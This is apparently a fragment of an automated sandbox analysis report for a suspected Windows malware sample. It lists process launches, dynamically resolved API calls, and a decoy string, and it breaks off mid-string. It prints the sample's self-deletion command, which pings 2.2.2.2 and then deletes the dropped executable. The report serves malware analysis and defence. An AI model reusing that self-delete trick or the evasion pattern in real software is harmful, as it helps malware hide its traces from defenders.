Start time:	14:52:26
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:52:26
Start date:	02/11/2024
Path:	C:\Users\user\AppData\RoamingEBFBKKJECA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\RoamingEBFBKKJECA.exe"
Imagebase:	0x1a0000
File size:	109'056 bytes
MD5 hash:	BA38615AB308EFBDB2A877277AB76CD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:52:27
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\user\AppData\RoamingEBFBKKJECA.exe
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:52:27
Start date:	02/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:52:27
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 2.2.2.2 -n 1 -w 3000
Imagebase:	0x600000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:52:28
Start date:	02/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6456 -s 2432
Imagebase:	0xfc0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:52:58
Start date:	02/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=2624 --field-trial-handle=2036,i,12206267009108373417,9523232832963230002,262144 /prefetch:8
Imagebase:	0x7ff7fb980000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00419F20 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(77190000,02D1B1B0), ref: 00419F3D
GetProcAddress.KERNEL32(77190000,02D1B1D0), ref: 00419F55
GetProcAddress.KERNEL32(77190000,02D1E840), ref: 00419F6E
GetProcAddress.KERNEL32(77190000,02D1E858), ref: 00419F86
GetProcAddress.KERNEL32(77190000,02D1E660), ref: 00419F9E
GetProcAddress.KERNEL32(77190000,02D1E8A0), ref: 00419FB7
GetProcAddress.KERNEL32(77190000,02D20A50), ref: 00419FCF
GetProcAddress.KERNEL32(77190000,02D1E888), ref: 00419FE7
GetProcAddress.KERNEL32(77190000,02D1E678), ref: 0041A000
GetProcAddress.KERNEL32(77190000,02D1E8B8), ref: 0041A018
GetProcAddress.KERNEL32(77190000,02D1E6A8), ref: 0041A030
GetProcAddress.KERNEL32(77190000,02D1B350), ref: 0041A049
GetProcAddress.KERNEL32(77190000,02D1B2B0), ref: 0041A061
GetProcAddress.KERNEL32(77190000,02D1B370), ref: 0041A079
GetProcAddress.KERNEL32(77190000,02D1B1F0), ref: 0041A092
GetProcAddress.KERNEL32(77190000,02D1E8E8), ref: 0041A0AA
GetProcAddress.KERNEL32(77190000,02D1E900), ref: 0041A0C2
GetProcAddress.KERNEL32(77190000,02D206E0), ref: 0041A0DB
GetProcAddress.KERNEL32(77190000,02D1B270), ref: 0041A0F3
GetProcAddress.KERNEL32(77190000,02D1E690), ref: 0041A10B
GetProcAddress.KERNEL32(77190000,02D1E918), ref: 0041A124
GetProcAddress.KERNEL32(77190000,02D24EF0), ref: 0041A13C
GetProcAddress.KERNEL32(77190000,02D24FF8), ref: 0041A154
GetProcAddress.KERNEL32(77190000,02D1B210), ref: 0041A16D
GetProcAddress.KERNEL32(77190000,02D24E18), ref: 0041A185
GetProcAddress.KERNEL32(77190000,02D25088), ref: 0041A19D
GetProcAddress.KERNEL32(77190000,02D24E60), ref: 0041A1B6
GetProcAddress.KERNEL32(77190000,02D24E78), ref: 0041A1CE
GetProcAddress.KERNEL32(77190000,02D250D0), ref: 0041A1E6
GetProcAddress.KERNEL32(77190000,02D24F68), ref: 0041A1FF
GetProcAddress.KERNEL32(77190000,02D24E00), ref: 0041A217
GetProcAddress.KERNEL32(77190000,02D24F38), ref: 0041A22F
GetProcAddress.KERNEL32(77190000,02D24DE8), ref: 0041A248
GetProcAddress.KERNEL32(77190000,02D21BE0), ref: 0041A260
GetProcAddress.KERNEL32(77190000,02D24E48), ref: 0041A278
GetProcAddress.KERNEL32(77190000,02D24E30), ref: 0041A291
GetProcAddress.KERNEL32(77190000,02D1B3B0), ref: 0041A2A9
GetProcAddress.KERNEL32(77190000,02D24E90), ref: 0041A2C1
GetProcAddress.KERNEL32(77190000,02D1B290), ref: 0041A2DA
GetProcAddress.KERNEL32(77190000,02D24F80), ref: 0041A2F2
GetProcAddress.KERNEL32(77190000,02D24FB0), ref: 0041A30A
GetProcAddress.KERNEL32(77190000,02D1B2D0), ref: 0041A323
GetProcAddress.KERNEL32(77190000,02D1AFD0), ref: 0041A33B
LoadLibraryA.KERNEL32(02D24EA8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
LoadLibraryA.KERNEL32(02D24F08,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
LoadLibraryA.KERNEL32(02D24EC0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
LoadLibraryA.KERNEL32(02D24ED8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
LoadLibraryA.KERNEL32(02D24F20,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
LoadLibraryA.KERNEL32(02D24FE0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
LoadLibraryA.KERNEL32(02D250A0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
LoadLibraryA.KERNEL32(02D250B8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
GetProcAddress.KERNEL32(77040000,02D1AFF0), ref: 0041A3EA
GetProcAddress.KERNEL32(77040000,02D24F50), ref: 0041A402
GetProcAddress.KERNEL32(77040000,02D1E048), ref: 0041A41A
GetProcAddress.KERNEL32(77040000,02D24F98), ref: 0041A433
GetProcAddress.KERNEL32(77040000,02D1B770), ref: 0041A44B
GetProcAddress.KERNEL32(704D0000,02D20668), ref: 0041A470
GetProcAddress.KERNEL32(704D0000,02D1B670), ref: 0041A489
GetProcAddress.KERNEL32(704D0000,02D20730), ref: 0041A4A1
GetProcAddress.KERNEL32(704D0000,02D24FC8), ref: 0041A4B9
GetProcAddress.KERNEL32(704D0000,02D25058), ref: 0041A4D2
GetProcAddress.KERNEL32(704D0000,02D1B430), ref: 0041A4EA
GetProcAddress.KERNEL32(704D0000,02D1B710), ref: 0041A502
GetProcAddress.KERNEL32(704D0000,02D25010), ref: 0041A51B
GetProcAddress.KERNEL32(768D0000,02D1B730), ref: 0041A53C
GetProcAddress.KERNEL32(768D0000,02D1B3D0), ref: 0041A554
GetProcAddress.KERNEL32(768D0000,02D25070), ref: 0041A56D
GetProcAddress.KERNEL32(768D0000,02D25028), ref: 0041A585
GetProcAddress.KERNEL32(768D0000,02D1B690), ref: 0041A59D
GetProcAddress.KERNEL32(75790000,02D20758), ref: 0041A5C3
GetProcAddress.KERNEL32(75790000,02D208E8), ref: 0041A5DB
GetProcAddress.KERNEL32(75790000,02D25040), ref: 0041A5F3
GetProcAddress.KERNEL32(75790000,02D1B4D0), ref: 0041A60C
GetProcAddress.KERNEL32(75790000,02D1B3F0), ref: 0041A624
GetProcAddress.KERNEL32(75790000,02D20938), ref: 0041A63C
GetProcAddress.KERNEL32(75A10000,02D25178), ref: 0041A662
GetProcAddress.KERNEL32(75A10000,02D1B750), ref: 0041A67A
GetProcAddress.KERNEL32(75A10000,02D1DFF8), ref: 0041A692
GetProcAddress.KERNEL32(75A10000,02D25148), ref: 0041A6AB
GetProcAddress.KERNEL32(75A10000,02D25100), ref: 0041A6C3
GetProcAddress.KERNEL32(75A10000,02D1B5F0), ref: 0041A6DB
GetProcAddress.KERNEL32(75A10000,02D1B650), ref: 0041A6F4
GetProcAddress.KERNEL32(75A10000,02D25118), ref: 0041A70C
GetProcAddress.KERNEL32(75A10000,02D25130), ref: 0041A724
GetProcAddress.KERNEL32(76850000,02D1B6F0), ref: 0041A746
GetProcAddress.KERNEL32(76850000,02D250E8), ref: 0041A75E
GetProcAddress.KERNEL32(76850000,02D25160), ref: 0041A776
GetProcAddress.KERNEL32(76850000,02D25190), ref: 0041A78F
GetProcAddress.KERNEL32(76850000,02D251A8), ref: 0041A7A7
GetProcAddress.KERNEL32(75690000,02D1B410), ref: 0041A7C8
GetProcAddress.KERNEL32(75690000,02D1B570), ref: 0041A7E1
GetProcAddress.KERNEL32(769C0000,02D1B610), ref: 0041A802
GetProcAddress.KERNEL32(769C0000,02D25388), ref: 0041A81A
GetProcAddress.KERNEL32(6F8C0000,02D1B4F0), ref: 0041A840
GetProcAddress.KERNEL32(6F8C0000,02D1B470), ref: 0041A858
GetProcAddress.KERNEL32(6F8C0000,02D1B530), ref: 0041A870
GetProcAddress.KERNEL32(6F8C0000,02D254C0), ref: 0041A889
GetProcAddress.KERNEL32(6F8C0000,02D1B510), ref: 0041A8A1
GetProcAddress.KERNEL32(6F8C0000,02D1B590), ref: 0041A8B9
GetProcAddress.KERNEL32(6F8C0000,02D1B5B0), ref: 0041A8D2
GetProcAddress.KERNEL32(6F8C0000,02D1B550), ref: 0041A8EA
GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0041A901
GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0041A917
GetProcAddress.KERNEL32(75D90000,02D254D8), ref: 0041A939
GetProcAddress.KERNEL32(75D90000,02D1E0A8), ref: 0041A951
GetProcAddress.KERNEL32(75D90000,02D25250), ref: 0041A969
GetProcAddress.KERNEL32(75D90000,02D251F0), ref: 0041A982
GetProcAddress.KERNEL32(76470000,02D1B450), ref: 0041A9A3
GetProcAddress.KERNEL32(70220000,02D25208), ref: 0041A9C4
GetProcAddress.KERNEL32(70220000,02D1B630), ref: 0041A9DD
GetProcAddress.KERNEL32(70220000,02D252E0), ref: 0041A9F5
GetProcAddress.KERNEL32(70220000,02D25238), ref: 0041AA0D

Strings

InternetSetOptionA, xrefs: 0041A8F5
HttpQueryInfoA, xrefs: 0041A90C

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
strlen.MSVCRT ref: 00404740
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and 